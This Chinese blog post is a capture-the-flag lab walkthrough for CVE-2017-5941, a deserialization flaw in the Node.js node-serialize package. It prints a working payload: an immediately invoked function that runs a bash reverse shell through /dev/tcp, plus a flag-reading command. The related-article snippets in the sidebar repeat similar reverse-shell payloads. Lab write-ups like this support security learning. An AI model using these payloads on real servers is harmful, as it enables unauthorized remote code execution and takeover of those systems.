[春秋云镜]CVE-2017-5941

已于 2022-12-03 21:20:14 修改
阅读量5.1k 收藏 1
点赞数
分类专栏: 靶场 春秋云镜 文章标签: web安全 安全
于 2022-12-01 22:46:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/niubi707/article/details/128140210
版权

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!


靶场介绍

在 Node.js 的 node-serialize 包 0.0.4 中发现了一个问题。传递到 unserialize() 函数的不受信任的数据可以被利用,通过传递带有立即调用函数表达式 (IIFE) 的 JavaScript 对象来实现任意代码执行。

春秋云镜开启靶场:
http://eci-2ze0ed42bccqlo04ham5.cloudeci1.ichunqiu.com/

账号随便输 密码需要自己构造payload

_$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >& /dev/tcp/127.0.0.1/9991 0>&1"')}()

 更改IP跟端口为自己的

登录

成功获得shell

获取flag 

cat ../../../../../flag

春天11-
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-5941 (nodejs 代码执行)
beirry的博客
11-24 1196
vulfocus-nodejs 代码执行 (CVE-2017-5941) 复现环境 攻击机(192.168.95.58) 靶场环境(10.3.61.69) 复现过程 在含有nc文件目录下打开两个cmd,监听8888端口 nc -lvp [端口] 访问环境:http://10.3.61.69:55269 账号随意输入,密码构造payload如下 _$$ND_FUNC$$_function (){require('child_process').exec('bash -c "bash -i >&amp
vulfocus nodejs-cve_2017_5941过程
qq_26692927的博客
04-23 1388
题目是清晰的,漏洞环境存在cve-2017-5941. 出现的问题:nc不能反弹shell【无 -e参数】、网上的nc 不使用 -e 反弹shell 不成功。 最后利用nodejs的反序列化成功反弹shell。 使用nodejsshell.py 生成POC:nodejsshell。 添加()后进行base64编码替换cookie,反弹shell /tmp/目录下寻找flag 不知道 ...
Node.js 反序列化漏洞远程执行代码(CVE-2017-5941
acn19249的博客
06-15 922
2 Node.js 反序列化漏洞远程执行代码(CVE-2017-5941) 2.1 摘要 2.1.1 漏洞介绍 漏洞名称: Exploiting Node.js deserialization bug for Remote Code Execution 漏洞CVE id: CVE-2017-594 漏洞类型: 代码执行 Node.js存在反序列化远程代码执行漏洞,若不可信的数据传入un...
python反序列化漏洞_Node.js 反序列化漏洞(CVE-2017-5941)
weixin_42521450的博客
02-20 226
漏洞详情不可信的数据传入 unserialize() 函数,通过传递立即调用函数表达式(IIFE)的 JavaScript 对象可以实现任意代码执行。来自网络请求的 cookie 会传递到node-serialize 的序列化/反序列化模块 的 unserialize() 函数中payloadtest.jsvar serialize = require('node-serialize');var ...
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞,iis服务提权工具。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master,漏洞示例代码。
(5)通过Node.js 运行JS代码
Java田根旺
12-29 4157
​ 一、使用快捷键ctrl+`键打开终端,也可以手动选择菜单栏中的终端,然后编写一个hello.js文件 二、输入命令node .\node_demo\hello.js 三、得到JS文件的内容 如果没有显示成功,报如下错,我们来解决下该问题 原因:安装路径 npm里面不存在node.exe这个应用程序,所以才会导致报错。 解决办法: 把外面一层的node.exe 这个应用程序拷贝到 npm文件夹下面。 然后重启vscode 问题解决。 四、Node.js 有两种模式运行 JavaSc
node环境执行js文件
Flying____fish的博客
11-13 4315
JavaScript代码的执行;Node的REPL;Node程序执行参数传递
java 反序列化漏洞 视频_【漏洞分析】利用Node.js反序列化的漏洞执行远程代码(含演示视频)...
weixin_42191440的博客
03-04 207
翻译:阻圣预估稿费:100RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿漏洞介绍漏洞名称:Exploiting Node.js deserialization bug for Remote Code Execution漏洞CVE id:CVE-2017-5941漏洞类型:代码执行漏洞简介:不可信的数据传入了unserialize()函数,这导致我们可以通过传递带有立即调...
Flash 0day漏洞(CVE-2018-5002)千万不要乱打开Excel文档!
网站安全专家
06-09 1372
腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞(CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Excel文档发送给目标人员,诱骗目标人员打开文档。实际上,该恶意Excel文档经过特别构造,被嵌入了flash对象,用户一旦打开文档电脑就会中毒。CVE-2018-5002影响Adobe Flash Player 29.0.0.171及所有之...
Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
weixin_30433075的博客
08-22 462
2017年8月8日,CVE官网公布了CVE-2017-8641,在其网上的描述为: 意思是说,黑客可以通过在网页中嵌入恶意构造的javascript代码,使得微软的浏览器(如Edege),在打开这个网页时,造成堆溢出。通过精心构造javascript代码,可以通过浏览器在用户电脑上执行任意代码。受影响的版本包括下列操作系统中的浏览器(IE(9,10,11)和Edge): 1. Window...
web漏洞及tools
MoQiJie_
02-12 353
201702前沿漏洞WordPress REST API 内容注入漏洞 、Node.js 反序列化漏洞远程执行代码(CVE-2017-5941)、CmsEasy 5.5 cut_image 代码执行漏洞和phpMyAdmin本地文件包含漏洞。真是防不胜防啊! ------------------1.网络端口扫描工具:nmapping.eu安卓版:fingtelnet2.无线网络扫描air crac...
CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞利用--自测
weixin_30339969的博客
11-27 467
1.下载jboss http://jbossas.jboss.org/downloads/ 2.安装配置,自己百度 3.修改配置,端口和ip远程可以访问 路径:jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml 4.启动服务 到bin目录下启动run.bat 5.访问ip+端口(8082) ...
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271)
SoulCat
02-12 2581
Weblogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞概述: -该漏洞产生于WLS-WebServices这个核心组件中,因为它使用XMLDecoder来解析XML数据,直接构造payload,发送xml数据,即可利用该漏洞,上传webshell等等。 漏洞版本: 10.3.6.0.0,12.2.1.1.0,12.2.1.2.0,12.1.3.0.0 漏洞搭建...
“微软蓝屏”事件暴露网络安全哪些问题
最新发布
sheji888的专栏
07-23 386
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值